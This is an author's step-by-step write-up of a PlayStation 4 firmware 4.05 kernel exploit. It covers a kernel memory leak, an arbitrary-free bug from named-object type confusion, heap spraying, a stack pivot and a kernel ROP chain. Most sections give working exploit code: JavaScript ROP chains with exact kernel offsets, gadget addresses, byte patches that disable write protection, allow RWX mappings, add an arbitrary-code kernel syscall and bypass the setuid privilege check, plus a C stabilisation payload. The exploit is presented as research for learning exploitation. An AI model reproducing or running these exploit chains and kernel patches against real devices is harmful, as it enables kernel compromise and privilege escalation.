- Table of Contents
- Introduction
- Changes since 1.76
- Stage 1 - Information Disclosure
- Stage 2 - Arbitrary Free
- Stage 3 - Heap Spray/Object Fake
- Stage 4 - Kernel Stack Pivot
- Stage 5 - Building the Kernel ROP Chain
- Stage 6 - Trigger
- Stage 7 - Stabilizing the Object
- Conclusion
NOTE: Let it be said that I do not condone nor endorse piracy. As such, neither the exploit or this write-up will contain anything to enable piracy on the system.
Welcome to my PS4 kernel exploit write-up for 4.05. In this write-up I will provide a detailed explanation of how my public exploit implementation works, and I will break it down step by step. You can find the full source of the exploit here. The userland exploit will not be covered in this write-up, however I have already provided a write-up on this userland exploit in the past, so if you wish to check that out, click here. Let's jump into it.
Some notable things have changed since 1.76 firmware, most notably the change where Sony fixed the bug where we could allocate RWX memory from an unprivileged process. The process we hijack via the WebKit exploit no longer has RWX memory mapping permissions, as JiT is now properly handled by a seperate process. Calling sys_mmap() with the execute flag will succeed; however any attempt to actually execute this memory as code will result in an access violation. This means that our kernel exploit must be implemented entirely in ROP chains, no C payloads this time.
Another notable change is kernel ASLR (kASLR) is now enabled past 1.76.
Some newer system calls have also been implemented since 1.76. On 1.76, there were 85 custom system calls. On 4.05, we can see there are 120 custom system calls.
Sony has also removed system call 0, so we can no longer call any system call we like by specifying the call number in the rax
register. We will have to use wrappers from the libkernel.sprx module provided to us to access system calls.
The first stage of the exploit is to obtain important information from the kernel, I take full advantage of this leak and use it to obtain three pieces of information. To do this, we need a kernel information disclosure/leak. This happens when kernel memory is copied out to the user, but the buffer (or at least parts of it) are not initialized, so uninitialized memory is copied to the user. This means if some function called before it stores pointers (or any data for that matter) in this memory, it will be leaked. Attackers can use this to their advantage, and use a setup function to leak specific memory to craft exploits. This is what we will do.
I thought I'd include this section to help those who don't know how FreeBSD address prefixes work. It's important to know how to distinguish userland and kernel pointers, and which kernel pointers are stack, heap, or .text pointers.
FreeBSD uses a "limit" to define which pointers are userland and which are kernel. Userland can have addresses up to 0x7FFFFFFFFFFF. A kernel address is noted by having the 0x800000000000 bit set. In kernel, the upper 32-bits are set to an address prefix to specify what type of kernel address it is, and the lower 32-bits the rest of the virtual address. The prefixes are as follows, where x can be any hexadecimal digit for the address, and y is an arbitrary hexadecimal digit for the heap address prefix, which is randomized at boot as per kASLR:
- 0xFFFFFFFFxxxxxxxx = Kernel .text pointer
- 0xFFFFFF80xxxxxxxx = Kernel stack pointer
- 0xFFFFyyyyxxxxxxxx = Kernel heap pointer
System call 634 or sys_thr_get_ucontext()
allows you to obtain information on a given thread. The problem is, some areas of memory copied out are not initialized, and thus the function leaks memory at certain spots. This vector was patched in 4.50, as now before the buffer is used it is initialized to 0 via bzero()
.
The biggest issue with this function is it uses a lot of stack space, so we're very limited to what we can use for our setup function. Our setup function must subtract over 0x500 from rsp all in one go, and whatever we leak will be deep in the code.
This part of the exploit took the most time and research, as it is difficult to know what you are leaking without a debugger, it takes some educated guesses and experimentation to find an appropriate object. Getting the math down perfect won't do much good either because functions can change quite significantly between firmwares, especially when it's a jump like 1.76 to 4.05. This step took me around 1-2 months in my original exploit.
To call sys_thr_get_ucontext() successfully, we must create a thread first, an ScePthread specifically. We can do this using a function from libkernel, ScePthreadCreate(). The signature is as follows:
scePthreadCreate(ScePthread *thr, const ScePthreadAttr *attr, void *(*entry)(void *), void *arg, const char *name)
We can call this in WebKit on 4.05 by offset 0x11570 in libkernel.
Upon success, scePthreadCreate() should return a valid thread handle, and should fill the buffer passed in to ScePthread *thr
with an ScePthread struct - we need this as it will hold the thread descriptor we will use in subsequent calls for the leak.
Unfortunately, you cannot call sys_thr_get_ucontext()
on an active thread, so we must also suspend the thread before we can leak anything. We can do this via sys_thr_suspend_ucontext()
. The function signature is as follows:
sys_thr_suspend_ucontext(int sceTd)
Calling this in WebKit is simple, we just need to dereference the value at offset 0 of the buffer we provided to scePthreadCreate()
, this is the thread descriptor for the ScePthread.
We need a setup function that uses over 0x500 stack space as stated earlier, between the surface function and any functions it may call. Opening a file (a device for example) is a good place to look, because open() itself uses a lot of stack spaces, and it will also run through a bunch of other sub-routines such as filesystem functions.
I found that opening the "/dev/dipsw" device driver, I was able to leak not only a good object (which I will detail more in the "Object Leak" section below), but also leak kernel .text pointers. This will help us defeat kASLR for kernel patches and gadgets in our kernel ROP chain (from now on we will abbreviate this as "kROP chain").
Finally, we can call sys_thr_get_ucontext()
to get our leak. The signature is as follows:
sys_thr_get_ucontext(int sceTd, char *buf)
We simply pass sceTd
(the same one we got from creation and passed to sys_thr_suspend_ucontext), and pass a pointer to our buffer as the second argument. When the call returns, we will have leaked kernel information in buf
.
First, we want to locate the kernel's .text base address. This will be helpful for post-exploitation stuff, for example, cr0
gadgets are typically only available in kernel .text, as userland does not directly manipulate the cr0
register. We will want to manipulate the cr0
register to disable kernel write protection for kernel patching. How can we do this? We can simply leak a kernel .text pointer and subtract it's slide in the .text segment to find the base address of the kernel.
In our buffer containing the leaked memory, we can see at offset 0x128 we are leaking a kernel .text address. This is also convenient, because as you will see in the next section "Object Leak", it is adjacent to our object leak in memory, so it will also help us verify the integrity of our leak. Because I had a dump of 4.05 kernel already from my previous exploit, I found the slide of this .text pointer to be 0x109E96. For those curious, it is a pointer to the section in _vn_unlock()
where the flags are checked before unlocking a vnode.
A good indication that your slide is good, is the kernel .text base is always aligned to 0x4000, which is the PS4's page boundary. This means your kernel .text base address should end in '000'.
Secondly, we need to leak an object in the heap that we can later free() and corrupt to obtain code execution. Some objects are also much better candidates than others. The following traits make for a good object for exploitation:
- Has function pointers. Not needed per-se, you could obtain arbitary kernel R/W and use that to corrupt some other object, but function pointers are ideal.
- Localized. You don't want an object that is used by some other area in the kernel ideally, because this could make the exploit racey and less stable.
- Easy to fake. We need an object that we don't need to leak a bunch of other pointers to fake when we heap spray.
- Objects associated to things like file descriptors make for great targets!
At offset 0x130, it seems we leak a cdev_priv
object, which are objects that represent character devices in memory. It seems this object leaks from the devfs_open()
function, which also explains our _vn_unlock()
leak at 0x128 for the ASLR defeat.
Unfortunately, not all objects we leak are going to meet the ideal criteria. This object breaks criteria 2, however luckily it meets criteria 3 and we can fake it perfectly. Nothing else will use the dipsw
device driver while our exploit runs, meaning even though our exploit uses a global object, it is still incredibly stable. It also has a bunch of function pointers we can use to hijack code execution via the cdev_priv->cdp_c->c_devsw
object, meeting criteria 1.
We can also see that cdev_priv
objects are allocated in devfs_alloc()
, which is eventually called by make_dev()
. Luckily, cdev_priv
objects are malloc()'d and not zone allocated, so we should have no issues freeing it.
devfs_alloc(int flags)
{
struct cdev_priv *cdp;
struct cdev *cdev;
struct timespec ts;
cdp = malloc(sizeof *cdp, M_CDEVP, M_USE_RESERVE | M_ZERO | ((flags & MAKEDEV_NOWAIT) ? M_NOWAIT : M_WAITOK));
if (cdp == NULL)
return (NULL);
// ...
cdev = &cdp->cdp_c;
// ...
return (cdev);
}
One last piece of information we need is a stack address. The reason for this is when we stack pivot to run our ROP chain in kernel mode, we need to return to userland cleanly, meaning fix the stack register (rsp) which we broke.
Luckily, because kernel stacks are per-thread, we can use a stack address that we leak to calculate the new return location when the ROP chain is finished executing. I made this calculation by taking the difference of the base pointer (rbp) from where the kernel jumps to our controlled function pointer and a stack pointer that leaks. At offset 0x20 in the leak buffer we can see a stack address, I found the difference to be 0x3C0.
First, we will create our thread for the sys_thr_get_ucontext
leak, and set it so that it's program is an infinite loop gadget so it keeps running. We'll also create a ROP chain for stage 1, where we will open /dev/dipsw
and leak, and we'll also setup the namedobj for stage 3 as well.
var createLeakThr = p.call(libkernel.add32(0x11570), leakScePThrPtr, 0, window.gadgets["infloop"], leakData, stringify("leakThr"));
p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));
Then to leak, we will suspend the thread, open the /dev/dipsw
device driver, and leak the cdev_priv
object.
var stage1 = new rop(p, undefined);
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_suspend_ucontext']]), p.read4(p.read8(leakScePThrPtr)));
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_open']]), stringify("/dev/dipsw"), 0, 0);
stage1.saveReturnValue(targetDevFd);
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_get_ucontext']]), p.read4(p.read8(leakScePThrPtr)), leakData);
stage1.run();
Before continuing with the exploit for stability purposes, it's good to include an integrity check against your leak to ensure you know you're leaking the right object. The integrity check is verifying the kernel .text leak to ensure that the base address aligns with a page. This check will all at once allow us to defeat kASLR and check if the leak is valid.
// Extract leaks
kernelBase = p.read8(leakData.add32(0x128)).sub32(0x109E96);
objBase = p.read8(leakData.add32(0x130));
stackLeakFix = p.read8(leakData.add32(0x20));
if(kernelBase.low & 0x3FFF)
{
alert("Bad leak! Terminating.");
return false;
}
A combination of design flaws led to a critical bug in the kernel, which allows an attacker to free() an arbitrary address. The issue lies in the idt hash table that Sony uses for named objects. I won't go full in-depth on the idt hash table as that's already been covered in depth by fail0verflow's public write-up. The main issue is Sony stores the object's type as well as flags in one field, and allow the user to specify it. This means the attacker can cause type confusion, which later leads to an arbitrary free() situation.
By creating a named object with type = 0x5000 (or 0x4000 due to the function OR'ing the ID with 0x1000), we can cause type confusion in the idt hash table. Upon success, it returns an ID of the named object.
When sys_mdbg_service() goes to write bytes passed in from a userland buffer at offset 0x4 to 0x8 to the named object returned, it actually writes to the wrong object due to type confusion. This allows the attacker to overwrite the pointer's lower 32-bits in the named object with any value.
When sys_namedobj_delete() is called, it first free()'s at offset 0 of the object before free()ing the object. Because we can contain 0x4-0x8 in the object in sys_mdbg_service via type confusion, we can control the lower 32-bits of the pointer that is free()'d here. Luckily, because this object is SUPPOSED to contain a heap pointer at offset 0, the heap address prefix is set for us. If this was not the case, this bug would not be exploitable.
The first thing we need to do is create a named object to put in the idt
with the malicious 0x5000 type. We can do that via the sys_namedobj_create()
system call like this:
p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));
We need to be able to write to the no->name
field of the named object, because when we cause type confusion and delete the object, the address free()'d will be taken from the lower 32-bits of the no->name
field. To do this, we can use the sys_mdbg_service()
system call, like so:
p.write8(serviceBuff.add32(0x4), objBase);
p.writeString(serviceBuff.add32(0x28), "debug");
// ...
var stage3 = new rop(p, undefined);
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);
Finally, we need to trigger the free() on the address we wrote via sys_namedobj_delete()
. Because of the object being cast to a namedobj_dbg_t
type, it will free() the address specified at offset 0x4 (which is no->name
in namedobj_usr_t
. It is remarkable that this is the field that is free()'d, and that the field's upper 32-bits will already be set to the heap address prefix due to it being a pointer to the object's name. If this was not the case, we could not create a use-after-free() scenario as we would not be able to set the upper 32-bits, and this type confusion bug might otherwise be unexploitable.
We can trigger the free() by simply deleting our named object via:
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);
I'll detail a little bit in this section of what heap spraying is for those newer to exploitation, if you already know how it works however, feel free to skip this section.
Memory allocators have to be efficient, because allocating brand new memory is costly in terms of performance. To be more efficient, heap memory is typically sectioned into "chunks" (also called "buckets"), and these chunks are typically marked as "used" or "free". To save performance, if an allocation is requested, the kernel will first check to see if it can give you a chunk that's already been allocated (but marked "free") of a similar size before allocating a new chunk.
The chunk sizes are powers of 2 starting at 16, meaning you can get chunks of size 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, or 0x4000. You can find these defined in the kmemzones
array in FreeBSD's source file responsible for memory allocation, kern_malloc.c.
We can abuse this to control the data of our free()'d object, and thus corrupt it. The cdev_priv
object is 0x180 in size, meaning it will use a chunk of size 0x200. So if we continousily allocate, write, and deallocate a chunk of memory of a size above 0x100 and below 0x200, eventually the next malloc() call should give you the pointer you've maintained a reference to, which means your exploit can write to this pointer, and corrupt the backing memory of the object. This is called spraying the heap.
For more information on heap spraying, see here.
We're going to spray the heap with our fake object that we've created in userland. Our faked object will prevent the kernel from crashing by faking data we need to, and allow us to obtain code execution by hijacking a function pointer in the object. First let's take a look at the cdev
object, which is the first member (inlined) of cdev_priv
. For reference, each member also has it's offset in the structure.
As to not make this write-up longer than it needs to be, I will only include some of the pointers that I faked. Other integers in the struct such as flags, mode, and the time stamp members I took from dumping the object live.
The cdev
object is the core of the cdev_priv
object, and contains important information about the device. Notably, it includes the name of the device, it's operations vtable, reference counts, and a linked list to previous and next cdev_priv
devices.
struct cdev {
void *__si_reserved; // 0x000
u_int si_flags; // 0x008
struct timespec si_atime; // 0x010
struct timespec si_ctime; // 0x020
struct timespec si_mtime; // 0x030
uid_t si_uid; // 0x040
gid_t si_gid; // 0x044
mode_t si_mode; // 0x048
struct ucred *si_cred; // 0x050
int si_drv0; // 0x058
int si_refcount; // 0x05C
LIST_ENTRY(cdev) si_list; // 0x060
LIST_ENTRY(cdev) si_clone; // 0x070
LIST_HEAD(, cdev) si_children; // 0x080
LIST_ENTRY(cdev) si_siblings; // 0x088
struct cdev *si_parent; // 0x098
char *si_name; // 0x0A0
void *si_drv1, *si_drv2; // 0x0A8
struct cdevsw *si_devsw; // 0x0B8
int si_iosize_max; // 0x0C0
u_long si_usecount; // 0x0C8
u_long si_threadcount; // 0x0D0
union {
struct snapdata *__sid_snapdata;
} __si_u; // 0x0D8
char __si_namebuf[SPECNAMELEN + 1]; // 0x0E0
};
The si_name
member points to the __si_namebuf
buffer inside the object, which is 64-bytes in length. Normally, a string will be written here, "dipsw". We're going to overwrite this though for our stack pivot, which will be the objective of the next stage. It is important to fix this post-exploit, because other processes that may want to open the "dipsw" device driver will not be able to if the name is not set properly, as it cannot be identified.
p.write8(obj_cdev_priv.add32(0x0A0), objBase.add32(0x0E0));
p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot
si_devsw
is our ultimate target object. It's usually a static object in kernel .text which contains function pointers for all sorts of operations with the device, including ioctl()
, mmap()
, open()
, and close()
. We can fake this pointer and make it point to an object we setup in userland, as the PS4 does not have Supervisor-Mode-Access-Prevention (SMAP).
p.write8(obj_cdev_priv.add32(0x0B8), obj_cdevsw); // Target Object
Originally, I spent a lot of time trying to fake the members from 0x120 to 0x180 in the object. Some of these members are difficult to fake as there are linked lists and pointers to object's that are in completely different zones. We can use a neat trick to cheat our way out of not needing to fake any of this data in our spray. I will cover this more in-depth when we cover the heap spray specifics.
The cdevsw
object is a vtable which contains function pointers for various operations such as open()
, close()
, ioctl()
, and many more. Thankfully because the "dipsw" device driver isn't used while we're exploiting, we can just pick one to overwrite (I chose ioctl()
), trigger code execution, and fix the pointer back to the proper kernel .text location post-exploit.
struct cdevsw {
int d_version; // 0x00
u_int d_flags; // 0x04
const char *d_name; // 0x08
d_open_t *d_open; // 0x10
d_fdopen_t *d_fdopen; // 0x18
d_close_t *d_close; // 0x20
d_read_t *d_read; // 0x28
d_write_t *d_write; // 0x30
d_ioctl_t *d_ioctl; // 0x38
d_poll_t *d_poll; // 0x40
d_mmap_t *d_mmap; // 0x48
d_strategy_t *d_strategy; // 0x50
dumper_t *d_dump; // 0x58
d_kqfilter_t *d_kqfilter; // 0x60
d_purge_t *d_purge; // 0x68
d_mmap_single_t *d_mmap_single; // 0x70
int32_t d_spare0[3]; // 0x78
void *d_spare1[3]; // 0x88
LIST_HEAD(, cdev) d_devs; // 0xA0
int d_spare2; // 0xA8
union {
struct cdevsw *gianttrick;
SLIST_ENTRY(cdevsw) postfree_list;
} __d_giant; // 0xB0
};
We're going to overwrite the d_ioctl
address with our stack pivot gadget. When we go to call ioctl()
on our opened device driver, the kernel will jump to our stack pivot gadget, run our kROP chain, and cleanly exit.
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER
This is another member we must fix post-exploit, as if anything else that uses "dipsw" (which is quite a lot of other processes) goes to perform an operation such as open()
, it will crash the kernel because your faked object in userland will not be accessible by other processes as other processes will not have access to WebKit's mapped memory.
We can use the ioctl()
system call to spray using a bad file descriptor. The system call will first malloc()
memory, with the size being specified by the caller via parameter, and will copyin()
data we control into the allocated buffer. Due to the bad file descriptor, the system call will then free the buffer, and exit in error. It's a perfect vector for a spray because we control the size, the data being copied in, and it's immediately free'd.
The neat trick I mentioned earlier is using a size of 0x120 for our spray's copyin()
. Because 0x120 is greater than 0x100 and lesser than 0x200, the chunk size matches our target object. However, because we are only specifying 0x120 for the copyin()
, any data between 0x120-0x180 will not be initialized, meaning it will not get corrupted. No need to fake linked lists or attempt to fake pointers that we can't fake perfectly.
for(var i = 0; i < 500; i++)
{
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_ioctl']]), 0xDEADBEEF, 0x81200000, obj_cdev_priv);
}
stage3.run();
To execute our ROP chain, we're going to need to pivot the stack to that of our ROP chain, to do this we can use a gadget in the libc module. This gadget loads rsp from [rdi + 0xF8], and pushes [rdi + 0xE0], which we can use to set RIP to the ret
gadget. We control the rdi
register, as rdi is going to be loaded with the buffer we pass in to the ioctl()
call. Below is a snippet of the stack pivot gadget we will use from sceLibcInternal.sprx
:
mov rsp, [rdi+0F8h]
mov rcx, [rdi+0E0h]
push rcx
mov rcx, [rdi+60h]
mov rdi, [rdi+48h]
retn
Luckily, 0xE0 and 0xF8 fall inside the __si_namebuf
member of cdev
, which are members that can easily be fixed post-exploit.
From devfs_ioctl_f()
in /fs/devfs/devfs_vnops.c
(src):
// ...
dev_relthread(dev, ref);
// ...
error = dsw->d_ioctl(dev, com, data, fp->f_flag, td);
// ...
This is where the kernel will call the function pointer that we control. Notice rdi
is loaded with dev
, which is the cdev
object we control. We can easily implement this stack pivot in our object fake, like so:
p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
// ...
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot
// ...
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER
Here is an excellent resource on stack pivoting and how it works for those interested.
Our kROP or kernel ROP chain is going to be a chain of instructions that we run from supervisor mode. We want to accomplish a few things with this chain. First, we want to apply a few kernel patches to allow us to run payloads and escalate our privileges. Finally before returning we'll want to fix the object to stabilize the kernel.
We have to disable the write protection on the kernel .text before we can make any patches. We can use the mov cr0, rax
gadget to do this. The cr0 register contains various control flags for the CPU, one of which is the "WP" bit at bit 16. By unsetting this, we can write to read-only memory pages in ring0, such as kernel .text.
// Disable kernel write protection
kchain.push(window.gadgets["pop rax"]); // rax = 0x80040033;
kchain.push(0x80040033);
kchain.push(kernelBase.add32(0x389339)); // mov cr0, rax;
For more information on the cr0
control register, see the OSDev wiki.
We want to be able to run C payloads and run our loader, so we need to patch the mmap
system call to allow us to set the execute bit to map RWX memory pages.
seg000:FFFFFFFFA1824FD9 mov [rbp+var_61], 33h
seg000:FFFFFFFFA1824FDD mov r15b, 33h
These are the maximum allowed permission bits the user is allowed to pass to sys_mmap()
when mapping memory. By changing 0x33 in both of these move instructions to 0x37, it will allow us to specify the execute bit successfully.
// Patch sys_mmap: Allow RWX (read-write-execute) mapping
var kernel_mmap_patch = new int64(0x37B74137, 0x3145C031);
kchain.write64(kernelBase.add32(0x31CFDC), kernel_mmap_patch);
Sony checks and ensures that a syscall instruction can only be issued from the memory range of the libkernel.sprx module. They also check the instructions around it to ensure it keeps the format if a typical wrapper. These patches will allow us to use the syscall
instruction in our ROP chain, which will be important for fixing the object later.
The first patch allows kernel processes to initiate syscall
instructions. This is because processes have a p_dynlib
member that specifies if libkernel has been loaded. This patch makes certain that any module can call syscall
even if the libkernel module has not yet been loaded.
seg000:FFFFFFFFA15F5095 mov ecx, 0FFFFFFFFh
Which is patched to
mov ecx, 0x0
The second patch forces a jump below check to fail, so that our first patch is put to use.
seg000:FFFFFFFFA15F50BB cmp rdx, [rax+0E0h]
seg000:FFFFFFFFA15F50C2 jb short loc_FFFFFFFFA15F50D7
Which is patched to
seg000:FFFFFFFFA15F50BB jmp loc_FFFFFFFFA15F513D
This will allow WebKit to issue a syscall
instruction directly.
// Patch syscall: syscall instruction allowed anywhere
var kernel_syscall_patch1 = new int64(0x0000000, 0xF8858B48);
var kernel_syscall_patch2 = new int64(0x0007DE9, 0x72909000);
kchain.write64(kernelBase.add32(0xED096), kernel_syscall_patch1);
kchain.write64(kernelBase.add32(0xED0BB), kernel_syscall_patch2);
Our payloads are going to need to be able to resolve userland symbols, so these patches are essential for running payloads.
The first patch patches a check against a member that Sony added to the proc
structure that defines if a process can call sys_dynlib_dlsym()
.
seg000:FFFFFFFFA1652ACF mov rdi, [rbx+8]
seg000:FFFFFFFFA1652AD3 call sub_FFFFFFFFA15E6930
seg000:FFFFFFFFA1652AD8 cmp eax, 4000000h
seg000:FFFFFFFFA1652ADD jb loc_FFFFFFFFA1652D8B
The second patch forces a function that checks if the process should have dynamic resolving to always return 0.
seg000:FFFFFFFFA15EADA0 sub_FFFFFFFFA15EADA0 proc near ; CODE XREF: sys_dynlib_dlsym+F9↓p
seg000:FFFFFFFFA15EADA0 ; sys_dynlib_get_info+1FC↓p ...
seg000:FFFFFFFFA15EADA0 mov rax, gs:0
seg000:FFFFFFFFA15EADA9 mov rax, [rax+8]
seg000:FFFFFFFFA15EADAD mov rcx, [rax+340h]
seg000:FFFFFFFFA15EADB4 mov eax, 1
seg000:FFFFFFFFA15EADB9 test rcx, rcx
seg000:FFFFFFFFA15EADBC jz short locret_FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADBE test [rcx+0F0h], edi
seg000:FFFFFFFFA15EADC4 setnz al
seg000:FFFFFFFFA15EADC7 movzx eax, al
seg000:FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADCA locret_FFFFFFFFA15EADCA: ; CODE XREF: sub_FFFFFFFFA15EADA0+1C↑j
seg000:FFFFFFFFA15EADCA retn
seg000:FFFFFFFFA15EADCA sub_FFFFFFFFA15EADA0 endp
This is patched to simply:
seg000:FFFFFFFFA15EADA0 xor eax, eax
seg000:FFFFFFFFA15EADA2 ret
[nop x5]
Patching both of these checks should allow any process, even WebKit, to dynamically resolve symbols.
// Patch sys_dynlib_dlsym: Allow from anywhere
var kernel_dlsym_patch1 = new int64(0x000000E9, 0x8B489000);
var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
kchain.write64(kernelBase.add32(0x14AADD), kernel_dlsym_patch1);
kchain.write64(kernelBase.add32(0xE2DA0), kernel_dlsym_patch2);
Our goal with this patch is to create our own syscall under syscall #11. This syscall will allow us to execute arbitrary code in supervisor mode (ring0). It will only have two arguments, the first being a pointer to the function we want to execute. The second argument will be uap
to pass arguments to the function. This code creates an entry in the sysent
table.
// Add custom sys_exec() call to execute arbitrary code as kernel
var kernel_exec_param = new int64(0, 1);
kchain.write64(kernelBase.add32(0xF179A0), 0x02);
kchain.write64(kernelBase.add32(0xF179A8), kernelBase.add32(0x65750));
kchain.write64(kernelBase.add32(0xF179C8), kernel_exec_param);
We don't want the kernel exploit to run more than once, as once we install our custom kexec()
system call we don't need to. To do this, I decided to patch the privilege check out of the sys_setuid()
system call, so we will know if the kernel has been patched if we can successfully call setuid(0)
from WebKit.
seg000:FFFFFFFFA158DBB0 call priv_check_cred
To easily bypass this check, I decided to just change it to move 0 into the rax
register. The opcodes happened to be perfect size.
seg000:FFFFFFFFA158DBB0 mov eax, 0
As you can guess, this also doubles as a partial privilege escalation.
// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
var kexploit_check_patch = new int64(0x000000B8, 0x85C38900);
kchain.write64(kernelBase.add32(0x85BB0), kexploit_check_patch);
Finally, we want to exit our kROP chain to prevent crashing the kernel. To do this, we need to restore RSP to it's value before the stack pivot. As stated earlier, we have a stack leak at 0x20 in the leak buffer, and it's 0x3C0 off from a good RSP value to return to. These instructions will apply the RSP fix by popping the stack leak + 0x3C0
into the RSP register, and when the final gadget ret
's it will return to proper execution.
// Exit kernel ROP chain
kchain.push(window.gadgets["pop rax"]);
kchain.push(stackLeakFix.add32(0x3C0));
kchain.push(window.gadgets["pop rcx"]);
kchain.push(window.gadgets["pop rsp"]);
kchain.push(window.gadgets["push rax; jmp rcx"]);
Now we need to trigger the exploit by calling the ioctl()
system call on our object. The second parameter (cmd) does not matter because the handler will never be reached as we have overwritten it with our stack pivot gadget.
p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);
Finally, we need to ensure the object doesn't get corrupted. The cdev_priv
object is global, meaning other processes will go to use it at some point. Since we free()'d it's backing memory, some other allocation could steal this pointer and overwrite our faked object, causing unpredictable crashes. To avoid this, we can call malloc()
in the kernel a bunch of times to try to obtain this pointer, essentially we are performing a second heap spray, but if we find the address we want we are keeping the allocation.
Since the kernel payload needs to retrieve the address of the object to write to, we will store it at an absolute address, 0xDEAD0000. We will also use this mapping to execute our payload.
var baseAddressExecute = new int64(0xDEAD0000, 0);
var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);
var executeSegment = new memory(p, exploitExecuteAddress);
var objBaseStore = executeSegment.allocate(0x8);
var shellcode = executeSegment.allocate(0x200);
p.write8(objBaseStore, objBase);
We will also apply a few of our other patches to the object, such as restoring the object's name and original si_devsw
pointer.
int main(void)
{
int i;
void *addr;
uint8_t *ptrKernel;
int (*printf)(const char *fmt, ...) = NULL;
void *(*malloc)(unsigned long size, void *type, int flags) = NULL;
void (*free)(void *addr, void *type) = NULL;
// Get kbase and resolve kernel symbols
ptrKernel = (uint8_t *)(rdmsr(0xc0000082) - KERN_XFAST_SYSCALL);
malloc = (void *)&ptrKernel[KERN_MALLOC];
free = (void *)&ptrKernel[KERN_FREE];
printf = (void *)&ptrKernel[KERN_PRINTF];
uint8_t *objBase = (uint8_t *)(*(uint64_t *)(0xDEAD0000));
// Fix stuff in object that's corrupted by exploit
*(uint64_t *)(objBase + 0x0E0) = 0x7773706964;
*(uint64_t *)(objBase + 0x0F0) = 0;
*(uint64_t *)(objBase + 0x0F8) = 0;
// Malloc so object doesn't get smashed
for (i = 0; i < 512; i++)
{
addr = malloc(0x180, &ptrKernel[0x133F680], 0x02);
printf("Alloc: 0x%lx\n", addr);
if (addr == (void *)objBase)
break;
free(addr, &ptrKernel[0x133F680]);
}
printf("Object Dump 0x%lx\n", objBase);
for (i = 0; i < 0x180; i += 8)
printf("<Debug> Object + 0x%03x: 0x%lx\n", i, *(uint64_t *)(*(uint64_t *)(0xDEAD0000) + i));
// EE :)
return 0;
}
This payload was then compiled and converted into shellcode which is executed via our kexec()
system call we installed earlier.
var stage7 = new rop(p, undefined);
p.write4(shellcode.add32(0x00000000), 0x00000be9);
p.write4(shellcode.add32(0x00000004), 0x90909000);
p.write4(shellcode.add32(0x00000008), 0x90909090);
// ... [ommited for readability]
stage7.push(window.gadgets["pop rax"]);
stage7.push(11);
stage7.push(window.gadgets["pop rdi"]);
stage7.push(shellcode);
stage7.push(libkernel.add32(0x29CA)); // "syscall" gadget
stage7.run();
This exploit is quite an interesting exploit, though it did require a lot of guessing and would have been a lot more fun to work with should I have had a proper kernel debugger. To get a working object can be a long a grueling process depending on the leak you're using. Overall this exploit is incredibly stable, in fact I ran it over 30 times and WebKit nor the Kernel crashed once. I learned a lot from implementing it, and I hope I helped others like myself who are interested in exploitation and hopefully others will learn some things from this write-up.
- CTurt
- Flatz
- qwertyoruiopz
- other anonymous contributors
See any issues I glanced over? Open an issue or send me a tweet and let me know :)